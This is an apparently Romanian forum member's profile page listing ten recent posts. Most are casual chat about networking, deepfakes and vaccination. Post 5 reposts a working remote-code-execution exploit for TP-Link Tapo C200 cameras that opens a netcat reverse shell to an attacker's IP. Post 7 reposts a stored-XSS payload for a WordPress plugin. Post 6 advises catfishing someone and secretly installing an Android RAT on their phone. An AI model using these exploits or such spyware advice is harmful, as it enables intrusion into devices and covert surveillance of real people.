Jump to content

GabrielRo

Members
  • Posts

    38
  • Joined

  • Last visited

  • Days Won

    2

GabrielRo last won the day on December 15 2021

GabrielRo had the most liked content!

Reputation

23 Excellent

About GabrielRo

  • Rank
    Enthusiast
    Enthusiast

Profile Information

  • Gender
    Male

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Daca te uiti mai atent, a scris corect 192.168.1.1, nici de cum 192.168.1
  2. Dacă folosești IP ( vpn) de Olanda, cum ai vrea sa.ti scrie YouTube Ro.
  3. Fenomenul a apărut în urmă cu doi ani pe rețeaua Reddit, când un utilizator, cunoscut sub numele de ”deepfakes”, a făcut astfel de video-uri trucate, folosindu-se de chipurile unor actori celebri. Prima ”victimă” politică a acestei tehnologii a fost chiar fostul președinte Barack Obama. Recent, și președinta Republicii Moldova, Maia Sandu, a anunțat că a fost victima unui Deepfake.
  4. https://imgur.com/yw1Yi3H Raportat.
  5. # Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) # Date: 02/11/2022 # Exploit Author: hacefresko # Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/ # Version: 1.1.15 and below # Tested on: 1.1.11, 1.1.14 and 1.1.15 # CVE : CVE-2021-4045 # Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce import requests, urllib3, sys, threading, os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) PORT = 1337 REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version) if len(sys.argv) < 3: print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>") exit() victim = sys.argv[1] attacker = sys.argv[2] print("[+] Listening on %d" % PORT) t = threading.Thread(target=os.system, args=(NC_COMMAND,)) t.start() print("[+] Serving payload to %s\n" % victim) url = "https://" + victim + ":443/" json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}} requests.post(url, json=json, verify=False) Source
  6. Poți fi chiar tu detectivul, îți faci un cont fake cu niște poze luate de pe pinterest ii dai add me friends de pe acel cont creat de tine, și începi sa vorbești cu ea și vezi pana unde duce conversația voastră, sau ii plasezi la ea în telefon un server de android rat. Vezi tutoriale youtube AndroRat.
  7. # Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://profiles.wordpress.org/3dady/ # Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.0.1 # CVE : N/A # 1. Technical Description: The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady). c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text): " autofocus onfocus=alert(/XSS/)> d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed. Note: This change will be permanent until you modify the edited fields. Source: https://www.exploit-db.com/exploits/51021
  8. Va salut, imi puteti spune va rog daca este clean acest exe, si nu are nimic ascuns in acel exe.. Va multumesc! https://www.virustotal.com/gui/file/b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d https://www.hybrid-analysis.com/sample/b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d
  9. Asa este, totul ce se găsește aici public, găsești și acolo.. surse bubuite de Botnet IRC Rxbot, de la programe scrise în Visual Basic Dos Attack.
  10. Sunt vaccinat, si ma voi mai vaccina daca trebuie. Si nu bag in seama ce zice șoșoacă.
×
×
  • Create New...